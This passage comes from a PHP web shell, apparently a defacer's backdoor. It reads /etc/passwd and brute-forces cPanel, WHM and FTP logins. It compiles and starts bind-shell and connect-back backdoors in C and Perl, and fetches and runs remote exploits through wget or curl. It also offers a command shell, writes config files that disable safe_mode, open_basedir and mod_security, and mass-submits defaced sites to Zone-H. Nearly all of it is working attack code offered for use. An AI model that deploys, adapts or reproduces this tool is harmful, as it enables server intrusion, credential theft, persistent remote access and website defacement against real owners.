$rows=file('/etc/passwd');
if(!$rows) return 0;
foreach ($rows as $string)
{
$user = @explode(':',$string);
if(substr($string,0,1)!='#') array_push($users,$user[0]);
}
return $users;
}
if(!$users=get_users()) {echo '<center><font face=Verdana size=-2 color=red>'.$lang[$language.'_text96'].'</font></center>';}
else
{
print " <div align='center'>
		<form method='post' style='border: 1px solid #000000'><br><br>
		<TABLE style='BORDER-COLLAPSE: collapse' cellSpacing=0 borderColorDark=#666666 cellPadding=5 width='40%' bgColor=#303030 borderColorLight=#666666 border=1>
			<tr>
				<td>
					<b> Target ! : </font><input type='text' name='sasaran' size='16' value= $pasti class='inputz'></p></font></b></p>
					<div align='center'><br>
					<TABLE style='BORDER-COLLAPSE: collapse'
						cellSpacing=0
						borderColorDark=#666666
						cellPadding=5 width='50%' bgColor=#303030 borderColorLight=#666666 border=1>
						<tr> <td align='center'> <b>User</b></td> <td> <p align='center'> <b>Pass</b></td>
						</tr>
					</table>
					<p align='center'>
					<textarea rows='20' name='users' cols='25' style='border: 2px solid #1D1D1D; background-color: #000000; color:#C0C0C0' >";
foreach($users as $user) {echo $user."\n";}
print"</textarea>
		<textarea rows='20' name='passwords' cols='25' style='border: 2px solid #1D1D1D; background-color: #000000; color:#C0C0C0'>$crew</textarea><br>
		<br>
		<b>Sila pilih : </span><input name='option' value='manual' style='font-weight: 700;' type='radio'> Manual Target Brute : <input type='text' name='target' size='16' class='inputz' value= $manualtarget ><br />
		<input name='option' value='cpanel' style='font-weight: 700;' checked type='radio'> cPanel
		<input name='option' value='ftp' style='font-weight: 700;' type='radio'> ftp
		<input name='option' value='whm' style='font-weight: 700;' type='radio'> whm ==> <input type='submit' value='Brute !' name='submit' class='inputzbut'></p>
		</td></tr></table></td></tr></form><p align= 'left'>";
}
;echo '';
function manual_check($anjink,$asu,$babi,$lonte){
$ch = curl_init();
curl_setopt($ch,CURLOPT_URL,"$anjink");
curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
curl_setopt($ch,CURLOPT_HTTPAUTH,CURLAUTH_BASIC);
curl_setopt($ch,CURLOPT_USERPWD,"$asu:$babi");
curl_setopt ($ch,CURLOPT_CONNECTTIMEOUT,$lonte);
curl_setopt($ch,CURLOPT_FAILONERROR,1);
$data = curl_exec($ch);
if ( curl_errno($ch) == 28 ) {print '<b> Failed! : NEXT TARGET!</b>';exit;}
elseif ( curl_errno($ch) == 0 ){
print "<b>[ CyberSEC@email ]# </b> <b>Completed , Username = <font color='#FF0000'> $asu </font> Password = <font color='#FF0000'> $babi </font></b><br>";
}
curl_close($ch);
}
function ftp_check($link,$user,$pswd,$timeout){
$ch = curl_init();
curl_setopt($ch,CURLOPT_URL,"ftp://$link");
curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
curl_setopt($ch,CURLOPT_HTTPAUTH,CURLAUTH_BASIC);
curl_setopt($ch,CURLOPT_FTPLISTONLY,1);
curl_setopt($ch,CURLOPT_USERPWD,"$user:$pswd");
curl_setopt ($ch,CURLOPT_CONNECTTIMEOUT,$timeout);
curl_setopt($ch,CURLOPT_FAILONERROR,1);
$data = curl_exec($ch);
if ( curl_errno($ch) == 28 ) {print '<b> Failed! : NEXT TARGET!</b>';exit;}
elseif ( curl_errno($ch) == 0 ){
print "<b>serangan selesai , username = <font color='#FF0000'> $user </font> dan passwordnya = <font color='#FF0000'> $pswd </font></b><br>";
}
curl_close($ch);
}
function cpanel_check($anjink,$asu,$babi,$lonte){
$ch = curl_init();
curl_setopt($ch,CURLOPT_URL,"http://$anjink:2082");
curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
curl_setopt($ch,CURLOPT_HTTPAUTH,CURLAUTH_BASIC);
curl_setopt($ch,CURLOPT_USERPWD,"$asu:$babi");
curl_setopt ($ch,CURLOPT_CONNECTTIMEOUT,$lonte);
curl_setopt($ch,CURLOPT_FAILONERROR,1);
$data = curl_exec($ch);
if ( curl_errno($ch) == 28 ) {print '<b> Failed! : NEXT TARGET!</b>';exit;}
elseif ( curl_errno($ch) == 0 ){
print "<b>[ CyberSEC@email ]# </b> <b>Completed, Username = <font color='#FF0000'> $asu </font> Password = <font color='#FF0000'> $babi </font></b><br>";
}
curl_close($ch);
}
function whm_check($anjink,$asu,$babi,$lonte){
$ch = curl_init();
curl_setopt($ch,CURLOPT_URL,"http://$anjink:2086");
curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
curl_setopt($ch,CURLOPT_HTTPAUTH,CURLAUTH_BASIC);
curl_setopt($ch,CURLOPT_USERPWD,"$asu:$babi");
curl_setopt ($ch,CURLOPT_CONNECTTIMEOUT,$lonte);
curl_setopt($ch,CURLOPT_FAILONERROR,1);
$data = curl_exec($ch);
if ( curl_errno($ch) == 28 ) {print '<b> Failed! : NEXT TARGET!</b>';exit;}
elseif ( curl_errno($ch) == 0 )
{
print '<b>[ '.TITLE ." ]# </b> <b>Selesai , Username = <font color='#FF0000'> $asu </font> Password = <font color='#FF0000'> $babi </font></b><br>";
}
curl_close($ch);
}
if(isset($pokeng) &&!empty($pokeng))
{
$userlist = explode ("\n",$hn );
$passlist = explode ("\n",$crew );
print '<b>[ '.TITLE .'  ]# </b> ATTACK...!!! </font></b><br>';
foreach ($userlist as $asu)
{
$_user = trim($asu);
foreach ($passlist as $babi )
{
$_pass = trim($babi);
if ($bisa == 'manual')
{manual_check($manualtarget,$_user,$_pass,$lonte);}
if($bisa == 'ftp')
{ftp_check($pasti,$_user,$_pass,$lonte);}
if ($bisa == 'cpanel')
{cpanel_check($pasti,$_user,$_pass,$lonte);}
if ($bisa == 'whm')
{whm_check($pasti,$_user,$_pass,$lonte);}
}
}
}
}
elseif(isset($_GET['x']) &&($_GET['x'] == 'reverse'))
{
;echo '	<form action="?y=';echo $pwd;;echo '&amp;x=reverse" method="post">
<iframe
src ="http://www.yougetsignal.com/tools/web-sites-on-web-server//"
height="600"
width="100%">
</iframe>
';
}
elseif(isset($_GET['x']) &&($_GET['x'] == 'mass')){;echo '<form action="?y=';echo $pwd;;echo '&amp;x=mass" method="post">
<br><br>';echo '<p style="text-align: center;"> <img alt="" src="http://www.zone-h.org/images/logo.gif" style="width: 261px; height: 67px;" /></p>
<center><span style="font-size:1.6em;"> .: Notifier :. </span></center><center><form action="" method="post"><input class="inputz" type="text" name="defacer" size="67" value="DevilzSec" /><br> <select class="inputz" name="hackmode">
<option>------------------------------------SELECT-------------------------------------</option>
<option style="background-color: rgb(0, 0, 0);" value="1">known vulnerability (i.e. unpatched system)</option>
<option style="background-color: rgb(0, 0, 0);" value="2" >undisclosed (new) vulnerability</option>
<option style="background-color: rgb(0, 0, 0);" value="3" >configuration / admin. mistake</option>
<option style="background-color: rgb(0, 0, 0);" value="4" >brute force attack</option>
<option style="background-color: rgb(0, 0, 0);" value="5" >social engineering</option>
<option style="background-color: rgb(0, 0, 0);" value="6" >Web Server intrusion</option>
<option style="background-color: rgb(0, 0, 0);" value="7" >Web Server external module intrusion</option>
<option style="background-color: rgb(0, 0, 0);" value="8" >Mail Server intrusion</option>
<option style="background-color: rgb(0, 0, 0);" value="9" >FTP Server intrusion</option>
<option style="background-color: rgb(0, 0, 0);" value="10" >SSH Server intrusion</option>
<option style="background-color: rgb(0, 0, 0);" value="11" >Telnet Server intrusion</option>
<option style="background-color: rgb(0, 0, 0);" value="12" >RPC Server intrusion</option>
<option style="background-color: rgb(0, 0, 0);" value="13" >Shares misconfiguration</option>
<option style="background-color: rgb(0, 0, 0);" value="14" >Other Server intrusion</option>
<option style="background-color: rgb(0, 0, 0);" value="15" >SQL Injection</option>
<option style="background-color: rgb(0, 0, 0);" value="16" >URL Poisoning</option>
<option style="background-color: rgb(0, 0, 0);" value="17" >File Inclusion</option>
<option style="background-color: rgb(0, 0, 0);" value="18" >Other Web Application bug</option>
<option style="background-color: rgb(0, 0, 0);" value="19" >Remote administrative panel access bruteforcing</option>
<option style="background-color: rgb(0, 0, 0);" value="20" >Remote administrative panel access password guessing</option>
<option style="background-color: rgb(0, 0, 0);" value="21" >Remote administrative panel access social engineering</option>
<option style="background-color: rgb(0, 0, 0);" value="22" >Attack against administrator(password stealing/sniffing)</option>
<option style="background-color: rgb(0, 0, 0);" value="23" >Access credentials through Man In the Middle attack</option>
<option style="background-color: rgb(0, 0, 0);" value="24" >Remote service password guessing</option>
<option style="background-color: rgb(0, 0, 0);" value="25" >Remote service password bruteforce</option>
<option style="background-color: rgb(0, 0, 0);" value="26" >Rerouting after attacking the Firewall</option>
<option style="background-color: rgb(0, 0, 0);" value="27" >Rerouting after attacking the Router</option>
<option style="background-color: rgb(0, 0, 0);" value="28" >DNS attack through social engineering</option>
<option style="background-color: rgb(0, 0, 0);" value="29" >DNS attack through cache poisoning</option>
<option style="background-color: rgb(0, 0, 0);" value="30" >Not available</option>
option style="background-color: rgb(0, 0, 0);" value="8" >_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _</option>
</select> <br>

<select class="inputz" name="reason">
<option >------------------------------------SELECT-------------------------------------</option>
<option style="background-color: rgb(0, 0, 0);" value="1" >Heh...just for fun!</option>
<option style="background-color: rgb(0, 0, 0);" value="2" >Revenge against that website</option>
<option style="background-color: rgb(0, 0, 0);" value="3" >Political reasons</option>
<option style="background-color: rgb(0, 0, 0);" value="4" >As a challenge</option>
<option style="background-color: rgb(0, 0, 0);" value="5" >I just want to be the best defacer</option>
<option style="background-color: rgb(0, 0, 0);" value="6" >Patriotism</option>
<option style="background-color: rgb(0, 0, 0);" value="7" >Not available</option>
option style="background-color: rgb(0, 0, 0);" value="8" >_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _</option>
</select> <br>
<textarea class="inputz" name="domain" cols="90" rows="20">List Of Domains, 20 Rows.</textarea><br>
<input class="inputz" type="submit" value=" Send Now !! " name="SendNowToZoneH"/>
</form>';;echo '
';
echo '</form></center>';;echo '
';
function ZoneH($url,$hacker,$hackmode,$reson,$site )
{
$k = curl_init();
curl_setopt($k,CURLOPT_URL,$url);
curl_setopt($k,CURLOPT_POST,true);
curl_setopt($k,CURLOPT_POSTFIELDS,'defacer='.$hacker.'&domain1='.$site.'&hackmode='.$hackmode.'&reason='.$reson);
curl_setopt($k,CURLOPT_FOLLOWLOCATION,true);
curl_setopt($k,CURLOPT_RETURNTRANSFER,true);
$kubra = curl_exec($k);
curl_close($k);
return $kubra;
}
{
ob_start();
$sub = @get_loaded_extensions();
if(!in_array('curl',$sub))
{
die('<center><b>[-] Curl Is Not Supported !![-]</b></center>');
}
$hacker = $_POST['defacer'];
$method = $_POST['hackmode'];
$neden = $_POST['reason'];
$site = $_POST['domain'];
if (empty($hacker))
{
die ('<center><b>[+] YOU MUST FILL THE ATTACKER NAME [+]</b></center>');
}
elseif($method == '--------SELECT--------')
{
die('<center><b>[+] YOU MUST SELECT THE METHOD [+]</b></center>');
}
elseif($neden == '--------SELECT--------')
{
die('<center><b>[+] YOU MUST SELECT THE REASON [+]</b></center>');
}
elseif(empty($site))
{
die('<center><b>[+] YOU MUST INTER THE SITES LIST [+]</b></center>');
}
$i = 0;
$sites = explode("\n",$site);
while($i <count($sites))
{
if(substr($sites[$i],0,4) != 'http')
{
$sites[$i] = 'http://'.$sites[$i];
}
ZoneH('http://www.zone-h.com/notify/single',$hacker,$method,$neden,$sites[$i]);
echo 'Domain : '.$sites[$i].' Defaced Last Years !';
++$i;
}
echo '[+] Sending Sites To Zone-H Has Been Completed Successfully !!![+]';
}
;echo '';}
elseif(isset($_GET['x']) &&($_GET['x'] == 'phpinfo'))
{
@ob_start();
@eval('phpinfo();');
$buff = @ob_get_contents();
@ob_end_clean();
$awal = strpos($buff,'<body>')+6;
$akhir = strpos($buff,'</body>');
echo "<div class=\"phpinfo\">".substr($buff,$awal,$akhir-$awal).'</div>';
}
elseif(isset($_GET['view']) &&($_GET['view'] != ''))
{
if(is_file($_GET['view']))
{
if(!isset($file)) $file = magicboom($_GET['view']);
if(!$win &&$posix)
{
$name=@posix_getpwuid(@fileowner($file));
$group=@posix_getgrgid(@filegroup($file));
$owner = $name['name']."<span class=\"gaya\"> : </span>".$group['name'];
}
else {$owner = $user;}
$filn = basename($file);
echo "<table style=\"margin:6px 0 0 2px;line-height:20px;\">
			<tr>
				<td>Filename</td>
				<td>
					<span id=\"".clearspace($filn)."_link\">".$file."</span>
					<form action=\"?y=".$pwd."&amp;view=$file\" method=\"post\" id=\"".clearspace($filn)."_form\" class=\"sembunyi\" style=\"margin:0;padding:0;\">
						<input type=\"hidden\" name=\"oldname\" value=\"".$filn."\" style=\"margin:0;padding:0;\" />
						<input class=\"inputz\" style=\"width:200px;\" type=\"text\" name=\"newname\" value=\"".$filn."\" />
						<input class=\"inputzbut\" type=\"submit\" name=\"rename\" value=\"rename\" />
						<input class=\"inputzbut\" type=\"submit\" name=\"cancel\" value=\"cancel\"
							onclick=\"tukar('".clearspace($filn)."_link','".clearspace($filn)."_form');\" />
					</form>
				</td>
			</tr>
			<tr>
				<td>Size</td>
				<td>".ukuran($file).'</td>
			</tr>
			<tr>
				<td>Permission</td>
				<td>'.get_perms($file).'</td>
			</tr>
			<tr>
				<td>Owner</td>
				<td>'.$owner.'</td>
			</tr>
			<tr>
				<td>Create time</td>
				<td>'.date('d-M-Y H:i',@filectime($file)).'</td>
			</tr>
			<tr>
				<td>Last modified</td>
				<td>'.date('d-M-Y H:i',@filemtime($file)).'</td>
			</tr>
			<tr>
				<td>Last accessed</td>
				<td>'.date('d-M-Y H:i',@fileatime($file))."</td>
			</tr>
			<tr>
				<td>Actions</td>
				<td><a href=\"?y=$pwd&amp;edit=$file\">edit</a>
					| <a href=\"javascript:tukar('".clearspace($filn)."_link','".clearspace($filn)."_form');\">rename</a>
					| <a href=\"?y=$pwd&amp;delete=$file\">delete</a>
					| <a href=\"?y=$pwd&amp;dl=$file\">download</a>&nbsp;(<a href=\"?y=$pwd&amp;dlgzip=$file\">gz</a>)
				</td>
			</tr>
			<tr>
				<td>View</td>
				<td><a href=\"?y=".$pwd.'&amp;view='.$file."\">text</a>
					| <a href=\"?y=".$pwd.'&amp;view='.$file."&amp;type=code\">code</a>
					| <a href=\"?y=".$pwd.'&amp;view='.$file."&amp;type=image\">img</a>
				</td>
			</tr>
		</table> ";
if(isset($_GET['type']) &&($_GET['type']=='image'))
{echo "<div style=\"text-align:center;margin:8px;\"><img src=\"?y=".$pwd.'&amp;img='.$filn."\"></div>";}
elseif(isset($_GET['type']) &&($_GET['type']=='code'))
{echo "<div class=\"viewfile\">";$file = wordwrap(@file_get_contents($file),'240',"\n");@highlight_string($file);echo '</div>';}
else 	{echo "<div class=\"viewfile\">";echo nl2br(htmlentities((@file_get_contents($file))));echo '</div>';}
}
elseif(is_dir($_GET['view'])){echo showdir($pwd,$prompt);}
}
elseif(isset($_GET['edit']) &&($_GET['edit'] != ''))
{
if(isset($_POST['save']))
{
$file = $_POST['saveas'];
$content = magicboom($_POST['content']);
if($filez = @fopen($file,'w'))
{
$time = date('d-M-Y H:i',time());
if(@fwrite($filez,$content)) $msg = "File Saved <span class=\"gaya\">@</span> ".$time;
else $msg = 'failed to save';@fclose($filez);
}
else $msg = 'OMG!,Permission denied';
}
if(!isset($file)) $file = $_GET['edit'];
if($filez = @fopen($file,'r'))
{
$content = '';
while(!feof($filez))
{
$content .= htmlentities(str_replace("''","'",fgets($filez)));
}
@fclose($filez);
};echo '
	     <form action="?y=';echo $pwd;;echo '&amp;edit=';echo $file;;echo '" method="post">
		<table class="cmdbox">
			<tr>
				<td colspan="2">
				<textarea class="output" name="content"> ';echo $content;;echo ' </textarea>
				</td>
			<tr>
				<td colspan="2">Save as <input onMouseOver="this.focus();" id="cmd" class="inputz" type="text" name="saveas" style="width:60%;" value="';echo $file;;echo '" />
				<input class="inputzbut" type="submit" value="Save !" name="save" style="width:12%;" /> &nbsp;';echo $msg;;echo '				</td>
			</tr>
		</table>
	</form>
';
}
elseif(isset($_GET['x']) &&($_GET['x'] == 'netsploit'))
{
if (isset($_POST['bind']) &&!empty($_POST['port']) &&!empty($_POST['bind_pass']) &&($_POST['use'] == 'C'))
{
$port = trim($_POST['port']);
$passwrd = trim($_POST['bind_pass']);
tulis('bdc.c',$port_bind_bd_c);
exe('gcc -o bdc bdc.c');
exe('chmod 777 bdc');
@unlink('bdc.c');
exe('./bdc '.$port.' '.$passwrd.' &');
$scan = exe('ps aux');
if(eregi("./bdc $por",$scan))
{
$msg = '<p>Process found running, backdoor setup successfully.</p>';
}
else
{
$msg = '<p>Process not found running, backdoor not setup successfully.</p>';
}
}
elseif (isset($_POST['bind']) &&!empty($_POST['port']) &&!empty($_POST['bind_pass']) &&($_POST['use'] == 'Perl'))
{
$port = trim($_POST['port']);
$passwrd = trim($_POST['bind_pass']);
tulis('bdp',$port_bind_bd_pl);
exe('chmod 777 bdp');
$p2=which('perl');
exe($p2.' bdp '.$port.' &');
$scan = exe('ps aux');
if(eregi("$p2 bdp $port",$scan))
{$msg = '<p>Process found running, backdoor setup successfully.</p>';}
else {$msg = '<p>Process not found running, backdoor not setup successfully.</p>';}}
elseif (isset($_POST['backconn']) &&!empty($_POST['backport']) &&!empty($_POST['ip']) &&($_POST['use'] == 'C'))
{
$ip = trim($_POST['ip']);
$port = trim($_POST['backport']);
tulis('bcc.c',$back_connect_c);
exe('gcc -o bcc bcc.c');
exe('chmod 777 bcc');
@unlink('bcc.c');
exe('./bcc '.$ip.' '.$port.' &');
$msg = 'Now script try connect to '.$ip.' port '.$port.' ...';
}
elseif (isset($_POST['backconn']) &&!empty($_POST['backport']) &&!empty($_POST['ip']) &&($_POST['use'] == 'Perl'))
{
$ip = trim($_POST['ip']);
$port = trim($_POST['backport']);
tulis('bcp',$back_connect);
exe('chmod +x bcp');
$p2=which('perl');
exe($p2.' bcp '.$ip.' '.$port.' &');
$msg = 'Now script try connect to '.$ip.' port '.$port.' ...';
}
elseif (isset($_POST['expcompile']) &&!empty($_POST['wurl']) &&!empty($_POST['wcmd']))
{
$pilihan = trim($_POST['pilihan']);
$wurl = trim($_POST['wurl']);
$namafile = download($pilihan,$wurl);
if(is_file($namafile)) {$msg = exe($wcmd);}else $msg = "error: file not found $namafile";}
;echo '
	<table class="tabnet">
		<tr>
			<th>Port Binding</th>
			<th>Connect Back</th>
			<th>Load and Exploit</th>
		</tr>
		<tr>
			<td>
				<form method="post" actions="?y=';echo $pwd;;echo '&amp;x=netsploit">
				<table>
					<tr>
						<td>Port</td>
						<td>
						<input class="inputz" type="text" name="port" size="26" value="';echo $bindport ;echo '">
						</td>
					</tr>
					<tr>
						<td>Password</td>
						<td><input class="inputz" type="text" name="bind_pass" size="26" value="';echo $bindport_pass;;echo '"></td>
					</tr>
					<tr>
						<td>Use</td>
						<td style="text-align:justify">
							<p>
							<select class="inputz" size="1" name="use">
								<option value="Perl">Perl</option>
								<option value="C">C</option>
							</select>
							<input class="inputzbut" type="submit" name="bind" value="Bind !" style="width:120px">
						</td>
					</tr>
				</table>
				</form>
			</td>
			<td>
				<form method="post" actions="?y=';echo $pwd;;echo '&amp;x=netsploit">
				<table>
					<tr>
						<td>IP</td>
						<td>
						<input class="inputz" type="text" name="ip" size="26" value="';echo ((getenv('REMOTE_ADDR')) ?(getenv('REMOTE_ADDR')) : ('127.0.0.1'));;echo '">
						</td>
					</tr>
					<tr>
						<td>Port</td>
						<td>
						<input class="inputz" type="text" name="backport" size="26" value="';echo $bindport;;echo '">
						</td>
					</tr>
					<tr>
						<td>Use</td>
						<td style="text-align:justify">
							<p>
							<select size="1" class="inputz" name="use">
								<option value="Perl">Perl</option>
								<option value="C">C</option>
							</select>
							<input type="submit" name="backconn" value="Connect !" class="inputzbut" style="width:120px">
						</td>
					</tr>
				</table>
				</form>
			</td>
			<td>
				<form method="post" actions="?y=';echo $pwd;;echo '&amp;x=netsploit">
				<table>
					<tr>
						<td>url</td>
						<td><input class="inputz" type="text" name="wurl" style="width:250px;" value="www.some-code/exploits.c"></td>
					</tr>
					<tr>
						<td>cmd</td>
						<td><input class="inputz" type="text" name="wcmd" style="width:250px;" value="gcc -o exploits exploits.c;chmod +x exploits;./exploits;"></td>
					</tr>
					<tr>
						<td>
						<select size="1" class="inputz" name="pilihan">
							<option value="wwget">wget</option>
							<option value="wlynx">lynx</option>
							<option value="wfread">fread</option>
							<option value="wfetch">fetch</option>
							<option value="wlinks">links</option>
							<option value="wget">GET</option>
							<option value="wcurl">curl</option>
						</select>
						</td>
						<td colspan="2">
							<input type="submit" name="expcompile" class="inputzbut" value="Go !" style="width:246px;">
						</td>
					</tr>
				</table>
				</form>
			</td>
		</tr>
	</table>
	<div style="text-align:center;margin:2px;">';echo $msg;;echo '</div>
';}
elseif(isset($_GET['x']) &&($_GET['x'] == 'shell'))
{
;echo '
	<form action="?y=';echo $pwd;;echo '&amp;x=shell" method="post">
		<table class="cmdbox">
			<tr>
				<td colspan="2">
				<textarea class="output" readonly> ';if(isset($_POST['submitcmd'])) {echo @exe($_POST['cmd']);};echo ' </textarea>
				</td>
			</tr>
			<tr>
				<td colspan="2">';echo $prompt;;echo '				<input onMouseOver="this.focus();" id="cmd" class="inputz" type="text" name="cmd" style="width:60%;" value="" />
				<input class="inputzbut" type="submit" value="Go !" name="submitcmd" style="width:12%;" />
				</td>
			</tr>
		</table>
	</form> ';
}
else
{
if(isset($_GET['delete']) &&($_GET['delete'] != ''))
{
$file = $_GET['delete'];@unlink($file);
}
elseif(isset($_GET['fdelete']) &&($_GET['fdelete'] != ''))
{
@rmdir(rtrim($_GET['fdelete'],DIRECTORY_SEPARATOR));
}
elseif(isset($_GET['mkdir']) &&($_GET['mkdir'] != ''))
{
$path = $pwd.$_GET['mkdir'];@mkdir($path);
}
$buff = showdir($pwd,$prompt);
echo $buff;
}
echo '<form action="?y='.$pwd.'&amp;x=shell" method="post" style="margin:8px 0 0 0;">
				<table class="cmdbox" style="width:50%;"align="right">
				<td>CMD@'.$prompt.'</td>
				<td><input onMouseOver="this.focus();" id="cmd" class="inputz" type="text" name="cmd" style="width:400px;" value="" />
				<input class="inputzbut" type="submit" value="Execute !" name="submitcmd" style="width:80px;" /></td>
				<br>
			    </form>
			    </table>
				<table class="cmdbox" style="width:50%;"align="right">
			    <form action="?" method="get" style="margin:8px 0 0 0;">
				<input type="hidden" name="y" value="'.$pwd.'" />
				<tr>
				<td>View File/Folder</td>
				<td><input onMouseOver="this.focus();" id="goto" class="inputz" type="text" name="view" style="width:400px;" value="'.$pwd.'" />
				<input class="inputzbut" type="submit" value="Enter !" name="submitcmd" style="width:80px;" /></td>
				</tr>
			    </form></table>
				<form method="POST">
				<td>&nbsp;&nbsp;Tool</td><table style="width:50%;"align="left">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
				<select class="inputz" style="width:402px;" name="someAction">
				<option value="genHtaccess">Generate .Htaccess</option>
				<option value="genPhp">Generate PHP.INI</option>
				<option value="genINI">Generate INI.PHP</option>
				</select>
				<input style="width:80px;" class="inputzbut" type="submit" value="Do Action" name="doAction">
				</form></table>
			   ';
if($_POST['doAction'] &&($_POST['someAction'] == 'genPhp'))
{
$file = 'php.ini';
$filez = "$file";
$filex = fopen ($filez ,'w');
$file = 'safe_mode = Off
disable_functions = NONE
safe_mode_gid = OFF
open_basedir = OFF';
fwrite ( $filex ,$file ) ;
fclose ($filex);
echo '[+] php.ini Has Been Generated Successfully';
}
else if($_POST['doAction'] &&($_POST['someAction'] == 'genHtaccess'))
{
$file = '.htaccess';
$filez = "$file";
$filex = fopen ($filez ,'w');
$file = '<IfModule mod_security.c>
SecFilterEngine Off
SecFilterScanPOST Off
SecFilterCheckURLEncoding Off
SecFilterCheckCookieFormat Off
SecFilterCheckUnicodeEncoding Off
SecFilterNormalizeCookies Off
</IfModule>
<Limit GET POST>
order deny,allow
deny from all
allow from all
</Limit>
<Limit PUT DELETE>
order deny,allow
deny from all
</Limit>
SetEnv PHPRC '.getcwd().'/php.ini';
fwrite ( $filex ,$file ) ;
fclose ($filex);
echo '[+] .htaccess Has Been Generated Successfully';
}
else if($_POST['doAction'] &&($_POST['someAction'] == 'genINI'))
{
$file = 'ini.php';
$filez = "$file";
$filex = fopen ($filez ,'w');
$file = 'ini_restore("safe_mode");
ini_restore("open_basedir");';
fwrite ( $filex ,$file ) ;
fclose ($filex);
echo '[+] ini.php Has Been Generated Successfully';
}
echo	   '</tr>
				<table style="width:50%;"align="left">
				<td>&nbsp;Upload File&nbsp;&nbsp;&nbsp;&nbsp;</td>
				<td><form  action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">
				<td><input style="width:400px;" class="inputzbut" type="file" name="file" size="50" ><input class="inputzbut" style="width:80px;" name="_upl" type="submit" id="_upl" value="Upload"></form>
				</table></td>';
if( $_POST['_upl'] == 'Upload') {
if(@copy($_FILES['file']['tmp_name'],$_FILES['file']['name'])) {echo '<br><br>Have A Nice Day Dude ^_^';}
else {echo '<br><br>Failed';}}
echo        '<br><br><br><br>';
;echo '</div>
</body>
</html>
    ';
?>